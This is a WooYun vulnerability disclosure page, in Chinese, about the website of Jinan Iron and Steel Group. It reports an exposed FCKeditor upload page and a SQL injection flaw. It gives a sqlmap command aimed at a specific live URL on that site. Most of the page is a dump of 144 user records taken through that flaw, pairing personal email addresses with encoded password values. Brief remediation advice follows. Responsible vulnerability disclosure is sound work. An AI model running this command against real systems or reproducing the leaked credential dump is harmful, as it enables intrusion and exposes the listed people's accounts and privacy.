当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088141

漏洞标题:济钢集团有限公司站点 Fckeditor编辑器漏洞 + SQL注入

相关厂商:济钢集团有限公司

漏洞作者: 感染者

提交时间:2014-12-22 15:14

修复时间:2015-02-05 15:16

公开时间:2015-02-05 15:16

漏洞类型:网络敏感信息泄漏

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-22: 细节已通知厂商并且等待厂商处理中
2014-12-26: 厂商已经确认,细节仅向厂商公开
2015-01-05: 细节向核心白帽子及相关领域专家公开
2015-01-15: 细节向普通白帽子公开
2015-01-25: 细节向实习白帽子公开
2015-02-05: 细节向公众公开

简要描述:

济钢集团有限公司 网站编辑器漏洞+注入漏洞(大量信息泄露)

详细说明:

济钢集团有限公司 网站编辑器漏洞 + sql注入漏洞 ,可导致大量信息泄露。

漏洞证明:

一、编辑器
Fckeditor路径:
http://www.jigang.com.cn/jgjtww/editor/filemanagerhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/test.html
如图:

1.png


说明:可以上传shell
二、SQL注入
sql注入命令:
sqlmap -u http://www.jigang.com.cn/jgjtww/weblist.jsp?cid=1321 --dbs
如图:

2.png


可以看到有好多数据库,下面根据经验选择一个深入
测试DHCC数据库:

4.png


然后取得的C_USERNAME和C_PASSWORD的信息,
如图:

3.png


全部信息如下:

Database: DHCC
Table: T_USER
[144 entries]
+----------------------------+--------------------------+
| C_EMAIL                    | C_PASSWORD               |
+----------------------------+--------------------------+
| NULL                       | IKRclNb97rSQsiiRC6sIhQ== |
| whritedream@163.com        | HzhwvidPbEmz4xoMZyiVfw== |
| rlzy@msn.com               | SBAt7S9Xxu9JfBhKDqcKuA== |
| sa@msn.com                 | TBH6LiTuDXwTleQmPocSKA== |
| sa@msn.com                 | EwQKjytXY5r0ONO5Id3EEA== |
| dd@msn.com                 | 88mc5mWIwUCeMK1vKFz2/w== |
| as@msn.com                 | VHO177TeDPg9abFskeaEgA== |
| NULL                       | ewA7PsQumJoppxJqRWew9A== |
| li@msn.com                 | eKp4F0jCU/yDkvYmCbwgDQ== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL                       | DHS394QJpAIqLExaXKPuGQ== |
| goldswan01@163.com         | 7AKLzqTaaTajIX9RhJeNEw== |
| zhou_wf@163.com            | VIKNACl0r3SN40mpd0cVwQ== |
| zhouweifang282@sohu.com    | VIKNACl0r3SN40mpd0cVwQ== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| yangguowuguo@163.com       | THUSvRY3Uc4CISwL0tIO6Q== |
| jnty@pub.wx.jsinfo.net     | QK0wilh78ri5RjBIk9YI1Q== |
| liufuyong89@163.com        | YohpIC/cznlw3bfv4EWIbg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL                       | v3ikTG8qeUTbittU9zdipA== |
| pro8888@163.com            | SoGKmYCWVNzw4EcWZzIa8Q== |
| qing1qing1@sohu.com        | abhbBgzLkk6JWrbbqXA18Q== |
| wzx@jingningtool.com       | zFJsA6GzFaWxBF7ng+8Lhw== |
| NULL                       | JPSLm81+NYMc3BhkYZyBMw== |
| jinghuluo@yahoo.com.cn     | UsaeOlczEIGCMzHE5p0/Lg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| fm123boy@hotmail.com       | nb9xpclY3exzkkKiZRTlbQ== |
| NULL                       | jWDRTqKKqQb/OaiFKQ2PFA== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| 123456789                  | TYCxf/kl3caIo+RYKVTvjA== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| seven0one@sina.com.cn      | TYCxf/kl3caIo+RYKVTvjA== |
| ycjkgs@126.com             | eojsfqwnI6SqtCEuaMfYFA== |
| 5ai5ai@sina.com            | M3zqPVtS4m9MrK3O3RyizQ== |
| NULL                       | IwLKxo9x3GuQmDtUVdoicw== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| ????                       | aY1RoZ2KEhzlgUmde3AWaA== |
| yuanxj@jigang.com.cn       | IwLKxo9x3GuQmDtUVdoicw== |
| lkm8210@hotmail.com        | 4QrcOUm6Wau+VuBX8g+IPg== |
| wu                         | /KRvZB9SK09ykn8ReCjFlw== |
| NULL                       | 4QrcOUm6Wau+VuBX8g+IPg== |
| bltxs@sina.com             | KMtY9/6faF+16SRtXbqmyQ== |
| linyiyang@mecc.com.cn      | 5lrH7HZx1XHzJ0GhZo2VUw== |
| guohonglai@mecc.com.cn     | 4QrcOUm6Wau+VuBX8g+IPg== |
| NULL                       | ogx7xR2Z2FOpFxVl+CHDOg== |
| tb135@sohu.com             | q7Wyoc/DN2YXu0kieahO8A== |
| liu-5451736@163.com        | kbda5lb0L/GvVKd1xs5fkg== |
| dd                         | qSnj1vKJoH1OkRreQEt0OQ== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| li@msn.com                 | sdj8320NtwEccfww5670pA== |
| dd                         | Nuuh4eNDJ5hX6n9ppZcyTg== |
| li@msn.com                 | 4RwEP84nkVEu3mh4XBjE0w== |
| as@msn.com                 | xxXw54UtTTJltcl0QC/6/Q== |
| kinginking@8210.com        | cHcGBmdKqXS0WjCMgIJUZA== |
| bdzzy@msn.com              | MmkpAYUDvF4tRgzmizGC/w== |
| dd                         | 4IOSu4ne247W+ymPjnKcFQ== |
| dd                         | d+Z4lCbRMeTYYuysTH0MXQ== |
| renping67450@sina.com      | CtJ7Q5MiicrTsP92FtBRAw== |
| chinabosch@163.com         | F5aavPPuhzcgBacTxf1oWw== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| dd@msn.com                 | lyPGBE1v56AX/kwI4T4spg== |
| liu-5451736@163.com        | q4DywTH2H5foqfT1R/V/hg== |
| dd@msn.com                 | u5bBsXEdbrPu0Wz/W2GlYQ== |
| chengyunqiu0902@163.com    | 8K7XQ8atQ3C/48OpTRUK3w== |
| as@msn.com                 | E1fk4yDNw7k79ONI9QkbzQ== |
| KLG-123@163.COM            | lueSGJZetyySpUndWjMBEg== |
| bdzzy@msn.com              | 69j12P2cSFX/dJ1q+PsQvg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| dd@msn.com                 | oDzoaLw+8hF1xpLVXHfotQ== |
| NULL                       | mILdUNOWYCpGHnvLQ1CDlA== |
| NULL                       | v3ikTG8qeUTbittU9zdipA== |
| jcqp@tom.com               | 8/g7St6byb4vfCYZH43a6w== |
| dd@msn.com                 | VPo2JeSEUfyWdEGfaz88jw== |
| kinginking@sohu.com        | cHcGBmdKqXS0WjCMgIJUZA== |
| mzq0263@sina.com           | /daGMofjTEWWFwYiwCD5/w== |
| xlsaikeke@163.com          | ZwsUcorZkCrsujLiL6T2vQ== |
| NULL                       | 6TQSiXfouMaO32cfahl/eg== |
| NULL                       | kSeO18ACVNSqu6xIhRZJlg== |
| NULL                       | dOrT98G6whoxYg4v6KdEFA== |
| NULL                       | vN00FTpr5U47SMAAH0ltRA== |
| taoxg77@163.com            | ktCCauTpzfreYnGPXdhMMw== |
| bjtc@tcsensor.com          | fDv+td9Bir7RpyTcfzmWeA== |
| qjianangel@163.com         | Tvjw/mdrdzx8MnnW14UtpA== |
|  bjjns@sina.com            | 4QrcOUm6Wau+VuBX8g+IPg== |
| daqiang23@163.com          | kfHVMpmAzidmH7LtP1ogsA== |
| NULL                       | p7WE5pFDQN2zmgEm6SeBgA== |
| NULL                       | kuFG40U//NP0ohY72K1ovg== |
| 777                        | 3A+n3z0HkEoJKIvS0rtfQA== |
| shdemc@163.com             | X5/ESGAAQFmZM55+77o7eg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| fangzhou_88@163.com        | g7TvWuS7NgyWYors2pdCAA== |
| cool2680@sina.com          | yHjaigqri4CJdd1hlWzBkw== |
| NULL                       | udfg8WmHBAI1VOTvUTiMkw== |
| as@msn.com                 | greLiJMumWibbD8pFOVjNw== |
| li@msn.com                 | 4Ifj4CcLdlX7lwI88/MLuQ== |
| NULL                       | VKK/jAms5n01E6qhqnqg8w== |
| NULL                       | d6RG3hh8TpCBnFXOlodt/Q== |
| NULL                       | uzk4tkM8uaTrFiLJ8fe2TQ== |
| NULL                       | ICy5YqxZB1uWSwcVLSNLcA== |
| bangong@jhpm.com           | +tkWjVP8z2pRedPZgacWcg== |
| brucezeng790502@163.com    | VY/gs68nvM1BU91pz2VD6A== |
| lmsheng@163.net            | AulXK1qmPAyhevua4dMAlw== |
| NULL                       | aWw189UbxLd5Te/6eHUBFw== |
| woainihuanjing@sina.com.cn | RyeLK3CttmK2VkOb3/UdLA== |
| NULL                       | z80ghJXVZe9m59/5+Ydk2g== |
| NULL                       | JfnnlDI7RTiF9RgfG2JNCw== |
| 1                          | uck/vf0qMFBOBdOwsyMH2g== |
| NULL                       | xMpCOKC5I4INzFCab3WEmw== |
| qdzdy@mail.china.com       | E8L3L/1VdLzpFPUsjMlSJw== |
| dd@msn.com                 | dcBTQud9P87YLQvINayeLA== |
| as@msn.com                 | o2CIhS+0rdus+tDYUcY6hA== |
| lhzkli@tom.com             | LirSXtTangxaLLVdiM9ZLQ== |
| xiaocun99@sina.com         | q56CAfVGrwXdN8l0YValdA== |
| NULL                       | 2lGppFt73kLtwahelAU2ZA== |
| zhao98_98@yahoo.com.cn     | gjaThN9fxSQQfVBgNJuMOA== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| liuguang_he@163.com        | ZRMhP44BezLxtoRfOwTITQ== |
| zhaojiping0918@126.com     | v9kl+oYIS9AwD95/0F3dlw== |
| NULL                       | Rup1auw32OBr1BVPM2Balw== |
| runfeng@bsrunfeng.com      | s1lPHxeoIjP/QcQ3rzV07g== |
| as@msn.com                 | CN62AHFz+LP2B0TFA6LGsQ== |
| dd@msn.com                 | hU5CXGFrk318b9ZBUWu4Bg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| as@msn.com                 | dlR78kNHQd0FlGiKKiY1Iw== |
| ms863@yahoo.com.cn         | MPg+IhpLqqGdtn1gDG60sg== |
| penggangfu@163.com         | u3qmhr2oUNdBLNDeaeL72g== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL                       | TsGEAog2GtMjrC4eNSnROw== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| z55234                     | br52yftBG+l7Ow1It5GnyQ== |
| NULL                       | HzbBXWo9GNUujUk7yBh8uQ== |
| NULL                       | 2sdFNFoXzduN0Bg5Bo4qGw== |
| as@msn.com                 | cllT25kNqSq8sQZAXuB2FA== |
| 2552@126.COM               | Y4cPH3luZJiDs/4IIpyAbA== |
| dongdilvye@sina.com.cn     | Jk0ZdCS4zhLPpmOoAcCD9Q== |
| as@msn.com                 | fMtyfvA8Meo8WyYPbSh3IQ== |
| QUYINGCUN66                | JfnnlDI7RTiF9RgfG2JNCw== |
| dd@msn.com                 | pYlmvKqhnl3hBwJscfvz3Q== |
| www666999@163.com          | RsTYHA1UROOTC9cWKWWKFA== |
| NULL                       | ISMvKXpXpadDiUoOSoAfww== |
| as@msn.com                 | lY3qnKdfOiqBgL4wcKpUfw== |
+----------------------------+--------------------------+


说明:信息量巨大,仅测试了很小的一部分。恐怕会有大量企业隐私泄露风险

修复方案:

修复fck漏洞:删除没用的页面
SQL注入:过滤掉特殊字符

版权声明:转载请注明来源 感染者@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-12-26 16:14

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

评论